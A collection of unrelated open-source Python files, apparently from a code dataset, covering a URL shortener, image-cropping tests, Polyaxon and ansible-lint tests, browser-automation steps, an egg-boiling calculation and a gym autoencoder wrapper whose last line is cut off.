<filename>url_manager/views.py #coding: utf-8 import re import urllib from models import WrongURL, LongURL, ShortURL BASE62 = '01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' nBASE62 = len(BASE62) PATTERN = r'http://[^/^\s]+[.]\w{2,4}\S/?' def get_short_id(url): u'''긴 URL을 받아서 짧은 URL의 id를 반환''' if not url: return WrongURL(0) elif not re.match(PATTERN, url): return WrongURL(1) longUrl, isnew = LongURL.objects.get_or_create(url=url) if isnew: id = encode_basen(longUrl.id) try: return ShortURL.objects.create(id=id, longUrl=longUrl).id except: raise WrongURL(2) else: try: return ShortURL.objects.get(longUrl=longUrl).id except ShortURL.DoesNotExist: raise WrongURL(3) def get_long_url(id): u'''아이디를 입력받아 인코딩한다''' try: return urllib.quote(ShortURL.objects.get(id=id).longUrl.url.encode('utf-8'), safe=':/=\?&') except: return '' def encode_basen(id, n=nBASE62): u'''아이디를 입력받아 인코딩한다''' base = id rests = [] while base!=0: quotient, rest = divmod(base, n) rests.append(BASE62[rest]) base = quotient return ''.join(rests)
StarcoderdataPython
167432
from numpy import pi, isclose from pyroll.core import CircularOvalGroove def test_circular_oval(): g = CircularOvalGroove(depth=5.05, r1=7, r2=33) assert isclose(g.usable_width, 17.63799973 * 2) assert isclose(g.alpha1, 29.102618 / 180 * pi) assert isclose(g.alpha2, 29.102618 / 180 * pi) assert isclose(g.z1, 19.45501221)
StarcoderdataPython
12854487
<filename>test/demo-random.py import snap G = snap.GenFull(snap.PNEANet, 100) # get a new random generator, provide the seed value Rnd = snap.TRnd(42) # randomize the generator, every execution will produce a different sequence. # Comment out the line to get the same sequence on every execution. Rnd.Randomize() for i in range(0,10): # provide the random generator as a parameter to the function NId = G.GetRndNId(Rnd) print(NId) # result is not well formed, the following statement fails #print(NI.GetId())
StarcoderdataPython
4908163
<filename>core/tests/test_polypod/test_main/test_main_env_vars.py #!/usr/bin/python # # Copyright 2018-2021 Polyaxon, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest from polyaxon.connections.kinds import V1ConnectionKind from polyaxon.connections.schemas import ( V1BucketConnection, V1ClaimConnection, V1K8sResourceSchema, ) from polyaxon.env_vars.keys import ( POLYAXON_KEYS_COLLECT_ARTIFACTS, POLYAXON_KEYS_COLLECT_RESOURCES, POLYAXON_KEYS_LOG_LEVEL, ) from polyaxon.exceptions import PolypodException from polyaxon.polyflow import V1Plugins from polyaxon.polypod.common.env_vars import ( get_connection_env_var, get_env_var, get_env_vars_from_k8s_resources, get_items_from_config_map, get_items_from_secret, get_kv_env_vars, ) from polyaxon.polypod.main.env_vars import get_env_vars from polyaxon.polypod.specs.contexts import PluginsContextsSpec from polyaxon.schemas.types import V1ConnectionType, V1K8sResourceType from tests.utils import BaseTestCase @pytest.mark.polypod_mark class TestMainEnvVars(BaseTestCase): def setUp(self): super().setUp() # Secrets self.resource1 = V1K8sResourceType( name="non_mount_test1", schema=V1K8sResourceSchema(name="ref", items=["item1", "item2"]), is_requested=False, ) self.resource2 = V1K8sResourceType( name="non_mount_test2", schema=V1K8sResourceSchema(name="ref"), is_requested=False, ) self.resource3 = V1K8sResourceType( name="non_mount_test1", schema=V1K8sResourceSchema(name="ref", items=["item1", "item2"]), is_requested=True, ) self.resource4 = V1K8sResourceType( name="non_mount_test2", schema=V1K8sResourceSchema(name="ref"), is_requested=True, ) self.resource5 = V1K8sResourceType( name="non_mount_test2", schema=V1K8sResourceSchema(name="ref"), is_requested=True, ) self.resource6 = V1K8sResourceType( name="mount_test", schema=V1K8sResourceSchema(name="ref", mount_path="/test"), is_requested=True, ) # Connections self.bucket_store = V1ConnectionType( name="test_s3", kind=V1ConnectionKind.S3, schema=V1BucketConnection(bucket="s3//:foo"), secret=self.resource3.schema, ) self.mount_store = V1ConnectionType( name="test_claim", kind=V1ConnectionKind.VOLUME_CLAIM, schema=V1ClaimConnection( mount_path="/tmp", volume_claim="test", read_only=True ), ) def test_get_env_vars(self): assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=None, ) == [] ) def test_get_env_vars_with_kv_env_vars(self): # Check wrong kv env vars with self.assertRaises(PolypodException): get_env_vars( contexts=None, log_level=None, kv_env_vars=["x", "y", "z"], connections=None, secrets=None, config_maps=None, ) with self.assertRaises(PolypodException): get_env_vars( contexts=None, log_level=None, kv_env_vars={"x": "y"}, connections=None, secrets=None, config_maps=None, ) # Valid kv env vars assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=[["key1", "val1"], ["key2", "val2"]], connections=None, secrets=None, config_maps=None, ) == get_kv_env_vars([["key1", "val1"], ["key2", "val2"]]) ) def test_get_env_vars_with_artifacts_store(self): assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=None, ) == [] ) assert get_env_vars( contexts=PluginsContextsSpec.from_config( V1Plugins( collect_logs=False, collect_artifacts=True, collect_resources=True ) ), log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=None, ) == [ get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True), get_env_var(name=POLYAXON_KEYS_COLLECT_RESOURCES, value=True), ] assert ( get_env_vars( contexts=PluginsContextsSpec.from_config( V1Plugins( collect_logs=False, collect_artifacts=False, collect_resources=False, ) ), log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=None, ) == [] ) assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=None, ) == [] ) assert ( get_env_vars( contexts=PluginsContextsSpec.from_config( V1Plugins( collect_logs=False, collect_artifacts=True, collect_resources=False, ) ), log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=None, ) == [get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True)] ) def test_get_env_vars_with_secrets(self): assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=None, connections=None, secrets=[self.resource1, self.resource2], config_maps=None, ) == get_items_from_secret(secret=self.resource1) + get_items_from_secret(secret=self.resource2) ) assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=None, connections=None, secrets=[ self.resource1, self.resource2, self.resource3, self.resource4, ], config_maps=None, ) == get_items_from_secret(secret=self.resource1) + get_items_from_secret(secret=self.resource2) + get_items_from_secret(secret=self.resource3) + get_items_from_secret(secret=self.resource4) ) def test_get_env_vars_with_config_maps(self): assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=[self.resource1, self.resource2], ) == get_items_from_config_map(config_map=self.resource1) + get_items_from_config_map(config_map=self.resource2) ) assert ( get_env_vars( contexts=None, log_level=None, kv_env_vars=None, connections=None, secrets=None, config_maps=[ self.resource1, self.resource2, self.resource3, self.resource4, ], ) == get_items_from_config_map(config_map=self.resource1) + get_items_from_config_map(config_map=self.resource2) + get_items_from_config_map(config_map=self.resource3) + get_items_from_config_map(config_map=self.resource4) ) def test_get_env_vars_with_all(self): connection = V1ConnectionType( name="test_s3", kind=V1ConnectionKind.S3, schema=V1BucketConnection(bucket="s3//:foo"), secret=self.resource6.schema, ) env_vars = get_env_vars( contexts=PluginsContextsSpec.from_config( V1Plugins( collect_logs=False, collect_artifacts=True, collect_resources=True ) ), log_level="info", kv_env_vars=[["key1", "val1"], ["key2", "val2"]], connections=[connection], secrets=[ self.resource1, self.resource2, self.resource3, self.resource4, self.resource6, ], config_maps=[ self.resource1, self.resource2, self.resource3, self.resource4, ], ) expected = [ get_env_var(name=POLYAXON_KEYS_LOG_LEVEL, value="info"), get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True), get_env_var(name=POLYAXON_KEYS_COLLECT_RESOURCES, value=True), ] expected += get_connection_env_var(connection=connection, secret=self.resource6) expected += get_kv_env_vars([["key1", "val1"], ["key2", "val2"]]) expected += get_env_vars_from_k8s_resources( secrets=[ self.resource1, self.resource2, self.resource3, self.resource4, self.resource6, ], config_maps=[ self.resource1, self.resource2, self.resource3, self.resource4, ], ) assert env_vars == expected
StarcoderdataPython
6564418
<filename>ansible/tests/DepreciatedStatementUsage.py<gh_stars>1-10 from ansiblelint.rules import RulesCollection from ansiblelint.runner import Runner from ansiblelints.stage.DepreciatedStatementUsage import DepreciatedStatementUsage class TestDepreciatedStatementUsage: def test_file(self): collection = RulesCollection() collection.register(DepreciatedStatementUsage()) file_name = 'testResources/ansible-smell/adminbydefault.yml' good_runner = Runner(file_name, rules=collection) print(good_runner.run())
StarcoderdataPython
1647207
<reponame>pitchin/sentry<filename>src/sentry/models/projectownership.py from __future__ import absolute_import from jsonfield import JSONField from django.db import models from django.utils import timezone from sentry.db.models import Model, sane_repr from sentry.db.models.fields import FlexibleForeignKey from sentry.ownership.grammar import dump_schema, parse_rules class ProjectOwnership(Model): __core__ = True project = FlexibleForeignKey('sentry.Project', unique=True) raw = models.TextField(null=True) schema = JSONField(null=True) fallthrough = models.BooleanField(default=True) date_created = models.DateTimeField(default=timezone.now) last_updated = models.DateTimeField(default=timezone.now) is_active = models.BooleanField(default=True) class Meta: app_label = 'sentry' db_table = 'sentry_projectownership' __repr__ = sane_repr('project_id', 'is_active') def save(self, *args, **kwargs): if self.raw is None: self.schema = None else: self.schema = dump_schema(parse_rules(self.raw)) return super(ProjectOwnership, self).save(*args, **kwargs)
StarcoderdataPython
1848726
<reponame>pbs/django-cropduster import datetime import unittest import os import hashlib import shutil import uuid from django.conf import settings PATH = os.path.split(__file__)[0] from django.db import models from django.core.files.base import ContentFile from django.core.exceptions import ObjectDoesNotExist as DNE, ValidationError import cropduster.models as CM import cropduster.utils as CMU from PIL import Image abspath = lambda x: os.path.join(PATH, x) to_retina_path = lambda p: '%s@2x%s' % os.path.splitext(p) def save_all(objs): for o in objs: o.save() def delete_all(model): for o in model.objects.all(): o.delete() def hashfile(path): md5 = hashlib.md5() with file(path) as f: data = f.read(4096) while data: md5.update(data) data = f.read(4096) return md5.digest() settings.MEDIA_ROOT = settings.STATIC_ROOT = settings.UPLOAD_PATH = '/tmp/cd_test/%s' % uuid.uuid4().hex ORIG_IMAGE = abspath('testdata/img1.jpg') TEST_IMAGE = settings.UPLOAD_PATH + '/' + os.path.basename(ORIG_IMAGE) class TestCropduster(unittest.TestCase): def setUp(self): os.makedirs(settings.MEDIA_ROOT) settings.CROPDUSTER_UPLOAD_PATH = 'cd' os.system('cp %s %s' % (ORIG_IMAGE, TEST_IMAGE)) # Backup the image def tearDown(self): # Delete all objects delete_all( CM.Image ) delete_all( CM.SizeSet ) delete_all( CM.Size ) delete_all( CM.Crop ) if os.path.exists(settings.UPLOAD_PATH): os.system('rm -rf %s' % settings.UPLOAD_PATH) def create_size_sets(self): iss = CM.SizeSet(name='Facebook', slug='facebook') iss.save() thumb = CM.Size(name='Thumbnail', slug='thumb', width=60, height=60, auto_crop=True, retina=True, size_set=iss) thumb.save() banner = CM.Size(name='Banner', slug='banner', width=1024, aspect_ratio=1.3, size_set=iss) banner.save() iss2 = CM.SizeSet(name='Mobile', slug='mobile') iss2.save() splash = CM.Size(name='Headline', slug='headline', width=500, height=400, retina=True, auto_crop=True, size_set=iss2) splash.save() def get_test_image(self, image=TEST_IMAGE): cd1 = CM.Image(image=image) cd1.metadata.attribution = "AP", cd1.metadata.caption = 'This is a galaxy' cd1.save() return cd1 def test_original(self): cd1 = self.get_test_image() self.assertEquals(cd1.is_original, True) self.assertEquals(cd1.derived.count(), 0) def test_size_sets(self): """ Tests size sets work correctly on images. """ cd1 = self.get_test_image() self.create_size_sets() # Add the size set child_images = cd1.add_size_set(name='Facebook') # Check that we now have two derived images which haven't been rendered. self.assertEquals(len(child_images), 2) self.assert_(all(not ci.image for ci in child_images)) # Should be zero since we haven't saved the images self.assertEquals(cd1.derived.count(), 0) save_all(child_images) self.assertEquals(cd1.derived.count(), 2) # Try adding it again, which should basically do a no-op images = cd1.add_size_set(name='Facebook') # No new image sizes added, so no more images. self.assertEquals(len(images), 0) self.assertEquals(cd1.size_sets.count(), 1) # Try adding one that doesn't exist self.failUnlessRaises(DNE, cd1.add_size_set, name='foobar') # Add another new size_set new_images = cd1.add_size_set(slug='mobile') self.assertEquals(len(new_images), 1) save_all(new_images) self.assertEquals(cd1.derived.count(), 3) def test_render_original(self): """ Tests that we can render the original image. """ cd1 = self.get_test_image() size = CM.Size(name='test', slug='test', width=50, height=50, auto_crop=True, retina=False) size.save() cd1.size = size # Check that we are protecting original images. self.failUnlessRaises(ValidationError, cd1.render) # Get hash of original orig_hash = hashfile( cd1.image.path ) cd1.render(force=True) # Check that it hasn't overwritten the original file until we save. self.assertEquals( hashfile(cd1.image.path), orig_hash) cd1.save() # Check that it changed. self.assertNotEquals(orig_hash, hashfile( cd1.image.path ) ) def test_render_derived(self): """ Tests that we can correctly render derived images from the original. """ self.create_size_sets() cd1 = self.get_test_image() image = cd1.add_size_set(slug='mobile')[0] image.render() image.save() size = image.size self.assertEquals(image.width, size.width) self.assertEquals(image.height, size.height) self.assertNotEquals(image.original.image.path, image.image.path) # Check that files are not the same new_image_hash = hashfile(image.image.path) self.assertNotEquals( hashfile( image.original.image.path ), new_image_hash ) # Change the original image, and check that the derived image # also changes when re-rendered. cd1.size = CM.Size.objects.get(slug='thumb') cd1.render(force=True) cd1.save() image.render() image.save() self.assertNotEquals( hashfile(image.image.path), new_image_hash ) # Check that the images are relative self.assert_(not os.path.isabs(cd1.image.name)) def test_delete(self): """ Tests that deletion cascades from the root to all derived images. """ self.create_size_sets() cd1 = self.get_test_image() for image in cd1.add_size_set(slug='facebook'): image.render() image.save() for image in image.add_size_set(slug='facebook'): image.render() image.save() self.assertEquals(CM.Image.objects.count(), 5) cd1.delete() self.assertEquals(CM.Image.objects.count(), 0) def test_multi_level_delete(self): """ Creates a multi-level tree from one image and deletes it. """ self.create_size_sets() cd1 = self.get_test_image() stack = [cd1] for i,image in enumerate(stack): for size_set in CM.SizeSet.objects.all(): for new_image in image.add_size_set(size_set): new_image.render() new_image.save() stack.append(new_image) if i > 20: break # We should have a lot of images. self.assertEquals(CM.Image.objects.count(), len(stack)) cd1.delete() self.assertEquals(CM.Image.objects.count(), 0) def test_manual_derive(self): """ Tests that we can do one-off derived images. """ self.create_size_sets() cd1 = self.get_test_image() img = cd1.new_derived_image() size = CM.Size.objects.create(slug='testing', width=100, height=100, auto_crop=True, retina=True) # Test the manual size exists self.assertEquals(CM.Size.objects.count(), 4) self.assertEquals( cd1.has_size('testing'), False ) img.size = size # Check that the crop is deleted as well img.set_crop(0, 0, 200, 200).save() self.assertEquals(CM.Crop.objects.count(), 1) img.render() img.save() self.assertEquals( cd1.has_size('testing'), True ) self.assertEquals(img.width, 100) self.assertEquals(img.height, 100) # Test that the manual size is deleted with the image. img.delete() self.assertEquals(CM.Size.objects.count(), 3) self.assertEquals(CM.Size.objects.filter(pk=size.id).count(), 0) self.assertEquals(CM.Crop.objects.count(), 0) # No more derived images. self.assertEquals(cd1.derived.count(), 0) def test_crop(self): cd1 = self.get_test_image() img = cd1.new_derived_image() img.set_crop(100,100,300,300).save() img.render() img.save() self.assertEquals(img.width, 300) self.assertEquals(img.height, 300) def test_no_modify_original(self): """ Makes sure that a derived image cannot overwrite an original. """ cd1 = self.get_test_image() orig_hash = hashfile(cd1.image.path) img = cd1.new_derived_image() img.set_crop(100, 100, 300, 300).save() img.render() img.save() self.assertEquals(orig_hash, hashfile(cd1.image.path)) self.assertNotEquals(orig_hash, hashfile(img.image.path)) def test_calc_sizes(self): """ Tests that omitted dimension details are correctly calculated. """ size = CM.Size(slug='1', width=100, aspect_ratio=1.6) self.assertEquals(size.get_height(), round(100/1.6)) size2 = CM.Size(slug='2', height=100, aspect_ratio=2) self.assertEquals(size2.get_width(), 200) size3 = CM.Size(slug='3', height=3, width=4) self.assertEquals(size3.get_aspect_ratio(), 1.33) def test_variable_sizes(self): """ Tests that variable sizes work correctly. """ cd1 = self.get_test_image() img = cd1.new_derived_image() size = CM.Size(slug='variable', width=100, aspect_ratio=1.6) size.save() img.size = size img.render() img.save() self.assertEquals(size.get_height(), img.height) # Only width or only height size = CM.Size(slug='width_only', width=100) img.size = size img.render() img.save() self.assertEquals(img.width, 100) self.assertEquals(int(round(100/cd1.aspect_ratio)), img.height) self.assertEquals(cd1.aspect_ratio, img.aspect_ratio) size = CM.Size(slug='height_only', height=100) img.size = size img.render() img.save() self.assertEquals(img.height, 100) self.assertEquals(int(round(100 * cd1.aspect_ratio)), img.width) self.assertEquals(cd1.aspect_ratio, img.aspect_ratio) def _test_delete_images(self): """ Check that all image files are correctly deleted. Commented out since right now we don't really care about it. """ self.create_size_sets() cd1 = self.get_test_image() paths = [] for image in cd1.add_size_set(slug='facebook'): image.render() image.save() paths.append(image.image.path) # Check that the paths are unique self.assertEquals(len(paths), len(set(paths))) for path in paths: self.assert_(os.path.exists(path), "Image at %s does not exist!" % path) cd1.delete() for path in paths: self.assert_(not os.path.exists(path), "Image at %s was not deleted!" % path) def test_retina_image(self): """ Tests that retina images are properly rendered when they can be. """ cd1 = self.get_test_image() size1 = CM.Size(slug='thumbnail', width=128, height=128, retina=True) size1.save() img1 = cd1.new_derived_image() img1.size = size1 img1.render() img1.save() # Retina images can't be handled directly, they only give a path. self.assertEquals(img1.retina_path, to_retina_path(img1.image.path)) retina = Image.open(img1.retina_path) self.assertEquals(retina.size, (img1.width*2, img1.height*2)) # Check that the retina is removed if the retina would be too large. size1.width = cd1.width - 20 size1.height = cd1.height - 20 size1.save() img1.render() # Check we don't prematurely delete the retina self.assert_(os.path.isfile(img1.retina_path)) img1.save() self.assert_(not os.path.isfile(img1.retina_path)) def test_size_aspect_ratio(self): """ Tests that a bug in setting of aspect ratio is fixed. """ size = CM.Size(slug='test', width=100, aspect_ratio=12) size.save() self.assertEquals(size.aspect_ratio, 12) def test_bad_mimetype(self): """ Tests that we can handle incorrectly extensioned images. """ NEW_TEST_IMAGE = TEST_IMAGE + '.gif.1' shutil.copyfile(TEST_IMAGE, NEW_TEST_IMAGE) cd1 = self.get_test_image(NEW_TEST_IMAGE) img = cd1.new_derived_image() size = CM.Size(slug='thumbnail', width=128, height=128, retina=True) size.save() img.size = size # Since the the extension is clearly incorrect (should be jpeg), it should still # save it as jpeg img.render() img.save() def test_attribution_cascade(self): """ Tests that attribution is correctly propagated through from originals to children. """ cd1 = self.get_test_image() img = cd1.new_derived_image() img.set_manual_size(width=100, height=100).save() img.render() img.save() self.assertEquals(img.metadata.attribution, cd1.metadata.attribution) self.assertEquals(img.metadata.caption, cd1.metadata.caption) def test_recursive_save(self): """ Tests that we recursively save all root and intermediate images when saving a leaf image, if they have not been saved. """ cd1 = CM.Image(image=TEST_IMAGE) d1 = cd1.new_derived_image() d2 = d1.new_derived_image() d3 = d2.new_derived_image() d4 = d3.new_derived_image() # Nothing's been saved, so nothing should have an id. images = (cd1, d1, d2, d3) for i in images: self.assertEquals(i.pk, None) # Save partway d2.save() # Check that the ancestors were saved. last = None for i in (cd1, d1, d2): self.assert_(i.pk > last) last = i.pk # Check that the descendents are NOT saved for i in (d3,d4): self.assertEquals(i.pk, None) d4.save() last = None for i in images: self.assert_(i.pk > last) last = i.pk def test_variable_dimension(self): """ Tests that variable dimensions work properly. """ cd1 = self.get_test_image() img = cd1.new_derived_image() size = CM.Size(slug='thumbnail', width=128, retina=True) size.save() img.size = size img.set_crop(100,100,400,400).save() img.render() img.save() self.assertEquals(img.width, 128) self.assertEquals(img.height, 128) img.set_crop(1,1,128,256).save() img.render() img.save() self.assertEquals(img.width, 128) self.assertEquals(img.height, 256) def test_from_stream(self): """ Tests that streaming in data saves correctly, and into the correct location. """ # Fake loading it from a stream. cd1 = self.get_test_image(image=None) cf = ContentFile(file(TEST_IMAGE).read()) basename = os.path.basename(TEST_IMAGE) cd1.image.save(basename, cf) cd1.save() self.assert_(settings.UPLOAD_PATH in cd1.image.path) self.assertEquals(cd1.image.width, 897) def test_custom_upload_to(self): """ Tests whether we can set a custom cropduster upload to path. """ tm = TestModel() # Get the proxy image class image_cls = tm._meta.get_field_by_name('image')[0].rel.to image = image_cls() # Mimic uploading img cf = ContentFile(file(TEST_IMAGE).read()) basename = os.path.basename(TEST_IMAGE) image.image.save(basename, cf) image.save() tm.image = image tm.save() path = datetime.datetime.now().strftime('/test/%Y/%m/%d') self.assert_(path in tm.image.image.name) def test_dynamic_path(self): self.create_size_sets() tm = TestModel2() # Get the proxy image class image_cls = tm._meta.get_field_by_name('image')[0].rel.to image = image_cls() # Mimic uploading img cf = ContentFile(file(TEST_IMAGE).read()) basename = os.path.basename(TEST_IMAGE) image.image.save(basename, cf) image.save() # Setup the children for derived in image.add_size_set(name='Facebook'): derived.render() derived.save() # Base assert self.assert_( image.image.name.endswith( '/1/%s' % basename ), "Path mismatch: %s, %s" % (image.image.name, basename) ) old_name = image.image.name # Save the model tm.image = image tm.save() self.assert_( image.image.name.endswith( '/2/%s' % basename ), "Path mismatch: %s, %s" % (image.image.name, basename) ) self.assert_(os.path.isfile(tm.image.image.path), "Path %s is missing" % tm.image.image.path) tm.slug = 'foobar' tm.save() self.assert_( image.image.name.endswith( '/3/foobar/%s' % basename ), "Path mismatch: %s, %s" % (image.image.name, basename) ) # Everything should be different now... self.assert_(os.path.isfile(tm.image.image.path), "Path %s is missing" % tm.image.image.path) # Check that the children's retina images have moved for image in tm.image.descendants: if image.size.retina: self.assert_(os.path.isfile(image.retina_path), "Retina didn't get moved!") def test_proxy_image_convert(self): """ Tests that regular cropduster image saved to fields which use proxy versions. """ cd1 = self.get_test_image() t = TestModel() t.image = cd1 self.assert_(isinstance(cd1, CM.Image)) self.assertNotEquals(type(cd1), CM.Image) self.assert_(issubclass(type(cd1), CM.Image)) try: t.image = object() self.fail("This shouldn't be allowed!") except ValueError: pass def test_absolute_url(self): """ Tests whether absolute urls are created correctly. """ cd1 = self.get_test_image() cd1.save() image_basename = os.path.basename(TEST_IMAGE) # Test without hash image_url = cd1.get_absolute_url(False) self.assertEquals(image_url, os.path.join(settings.STATIC_URL, cd1.image.url)) # Test with hash image_url_hash = cd1.get_absolute_url() self.assert_('?' in image_url_hash, "Missing timestamp hash") last_timestamp = None for i in xrange(2): # Re-save to update the date_modified timestamp cd1.save() # Check the timestamp changed self.assertNotEquals(last_timestamp, cd1.date_modified) last_timestamp = cd1.date_modified raw_url, timestamp = image_url_hash.split('?') self.assertEquals(raw_url, image_url) # Convert the hex back to the original hashed_time = datetime.datetime.fromtimestamp(int(timestamp, 16)) # No microseconds on hashes, giving us a hash granularity # of one second. date_modified = cd1.date_modified - \ datetime.timedelta(microseconds = cd1.date_modified.microsecond) self.assertEquals(date_modified, hashed_time) def test_auto_transcode(self, normalize_ext=False): """ Tests that transcoding image formats works correctly. """ # Save JPEGS as GIFs cur_transcode = getattr(settings, 'CROPDUSTER_TRANSCODE', {}) setattr(settings, 'CROPDUSTER_TRANSCODE', {'JPEG': 'GIF'}) if normalize_ext: cur_normalize = getattr(settings, 'CROPDUSTER_NORMALIZE_EXT', False) setattr(settings, 'CROPDUSTER_NORMALIZE_EXT', True) cd1 = self.get_test_image() cd1.save() # New derived with arbitrary crop img = cd1.new_derived_image() img.set_crop(100,100,300,300).save() img.render() img.save() try: self.assertEquals(Image.open(img.image.path).format, 'GIF') if normalize_ext: self.assertEquals(os.path.splitext(img.image.path)[1], '.gif') else: self.assertEquals(os.path.splitext(img.image.path)[1], '.jpg') finally: setattr(settings, 'CROPDUSTER_TRANSCODE', {'JPEG': 'GIF'}) if normalize_ext: setattr(settings, 'CROPDUSTER_NORMALIZE_EXT', cur_normalize) def test_normalize_ext(self): """ Tests that extensions normalize correctly. """ self.test_auto_transcode(True) class TestModel(models.Model): image = CM.CropDusterField(upload_to='test/%Y/%m/%d') image2 = CM.CropDusterField(null=True, related_name='image2') image3 = CM.CropDusterField(to=CM.Image, null=True, related_name='image3') class Counter(object): counter = 0 def __call__(self, filename, instance=None): self.counter += 1 counter = `self.counter` if instance is None: return '%s/%s' % (counter, filename) return os.path.join(counter, instance.slug, filename) class TestModel2(models.Model): slug = "" image = CM.CropDusterField(upload_to=Counter(), dynamic_path=True) if __name__ == '__main__': unittest.main()
StarcoderdataPython
9699812
<reponame>mdmintz/seleniumspot from behave import step @step("Open the Calculator App") def go_to_calculator(context): context.sb.open("https://seleniumbase.io/apps/calculator") @step("Press C") def press_c(context): context.sb.click("button#clear") @step("Press (") def press_open_paren(context): context.sb.click('button[id="("]') @step("Press )") def press_close_paren(context): context.sb.click('button[id=")"]') @step("Press ÷") def press_divide(context): context.sb.click("button#divide") @step("Press ×") def press_multiply(context): context.sb.click("button#multiply") @step("Press -") def press_subtract(context): context.sb.click("button#subtract") @step("Press +") def press_add(context): context.sb.click("button#add") @step("Press =") def press_equal(context): context.sb.click("button#equal") @step("Press 1") def press_1(context): context.sb.click('button[id="1"]') @step("Press 2") def press_2(context): context.sb.click('button[id="2"]') @step("Press 3") def press_3(context): context.sb.click('button[id="3"]') @step("Press 4") def press_4(context): context.sb.click('button[id="4"]') @step("Press 5") def press_5(context): context.sb.click('button[id="5"]') @step("Press 6") def press_6(context): context.sb.click('button[id="6"]') @step("Press 7") def press_7(context): context.sb.click('button[id="7"]') @step("Press 8") def press_8(context): context.sb.click('button[id="8"]') @step("Press 9") def press_9(context): context.sb.click('button[id="9"]') @step("Press 0") def press_0(context): context.sb.click('button[id="0"]') @step("Press ←") def press_delete(context): context.sb.click("button#delete") @step("Press .") def press_dot(context): context.sb.click('button[id="."]') @step("Press [{number}]") def enter_number_into_calc(context, number): sb = context.sb for digit in number: sb.click('button[id="%s"]' % digit) @step("Evaluate [{equation}]") def evaluate_equation(context, equation): sb = context.sb for key in equation: if key == " ": continue elif key == "÷": sb.click("button#divide") elif key == "×": sb.click("button#multiply") elif key == "-": sb.click("button#subtract") elif key == "+": sb.click("button#add") else: sb.click('button[id="%s"]' % key) sb.click("button#equal") @step('Verify output is "{output}"') def verify_output(context, output): sb = context.sb sb.assert_exact_text(output, "#output") @step("Save calculator screenshot to logs") def save_calculator_screenshot_to_logs(context): sb = context.sb sb.save_screenshot_to_logs()
StarcoderdataPython
6462342
from math import * #Primero, pedimos la temperatura original del huevo. t0 = float(raw_input("Ingrese la temperatura original del huevo: ")) #Ahora, establezcamos los datos. M = 63 #Masa. Asumiremos un huevo grande c = 3.7 #Capacidad calorifica especifica ro = 1.038 #Densidad K = 0.0054 #Conductividad termica tw = 100 #Temperatura de ebullicion del agua ty = 70 #Temperatura final #Ahora, calculamos el tiempo necesario para llegar a la temperatura final t = ( (M**(2/3) * c * ro**(1/3)) / (K * pi**2 * ((4 * pi)/3)**(2/3) ) * log( 0.76 * ((t0 - tw)/(ty - tw)) )) print "El tiempo necesario es "+str(t)+" s"
StarcoderdataPython
8080876
import matplotlib.pyplot as plt import gym import time from csv import writer from stable_baselines3.common.type_aliases import GymObs, GymStepReturn from typing import Union import numpy as np import os from typing import Optional from autoencoder import load_ae import gym.wrappers class AutoEncoderWrapper(gym.Wrapper): def __init__(self, env, ae_path): super().__init__(env) self.env = env assert ae_path is not None self.ae = load_ae(ae_path) self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(self.ae.z_size,), dtype=np.float32) def reset(self): return self.ae.encode_from_raw_image(self.env.reset()[:, :, ::-1]).flatten() def step(self, action): obs, reward, done, infos = self.env.step(action) return self.ae.encode_from_raw_image(obs[:, :, ::-1]).flatten(), reward, done, infos class AutoEncoderHistoryWrapper(gym.Wrapper): def __init__(self, env: gym.Env, ae_path, num_history=10, max_throttle=1.0, min_throtthle=0.0, left_steering=-1.0, right_steering=1.0) -> None: super().__init__(env) self.env = env self.ae = load_ae(ae_path) self.max_throttle = max_throttle self.min_throttle = min_throtthle self.left_sterring = left_steering self.right_steering = right_steering self.num_command = 2 self.steering_diff = 0.15-1e-5 self.num_history = num_history self.history = np.zeros((1, self.num_command*self.num_history), dtype=np.float32) self.action_space = gym.spaces.Box( low=np.array([np.float32(self.left_sterring), np.float32(self.min_throttle)]), high=np.array([np.float32(self.right_steering), np.float32(self.max_throttle)]), dtype=np.float32 ) self.observation_space = gym.spaces.Box( low=np.finfo(np.float32).min, high=np.finfo(np.float32).max, shape=(1,self.ae.z_size + self.num_command*self.num_history), dtype=np.float32 ) def reset(self, **kwargs) -> GymObs: obs = self.ae.encode_from_raw_image(self.env.reset()[:, :, ::-1]).flatten() obs = np.reshape(obs, (1, self.ae.z_size)) self.history = np.zeros((1, self.num_command*self.num_history), dtype=np.float32) observation = np.concatenate((obs, self.history), axis=-1) return observation def step(self, action: Union[np.ndarray, int]) -> GymStepReturn: # last_steering = self.history[0, -2] # diff = np.clip(action[0] - last_steering, -self.steering_diff, self.steering_diff) # #print(f"pred {action[0]} - last {last_steering} - now {last_steering + diff}") # action[0] = last_steering + diff self.history = np.roll(self.history, shift=-self.num_command, axis=-1) self.history[..., -self.num_command:] = action obs, reward, done, info = self.env.step(action) obs = self.ae.encode_from_raw_image(obs[:, :, ::-1]).flatten() obs = np.reshape(obs, (1, self.ae.z_size)) # if action[1] == 0.0: # action[1] = 0.1 #prev_steering = self.history[0, -1] # # print("prev_steer", prev_steering) # # print("now steer", action[0]) #diff = np.clip(action[0]- prev_steering, -self.steering_diff, self.steering_diff) # # print("diff: ",diff) #action[0] = prev_steering + diff # # print("NEW steer", action[0], "\n") observation = np.concatenate((obs, self.history), axis=-1) return observation, 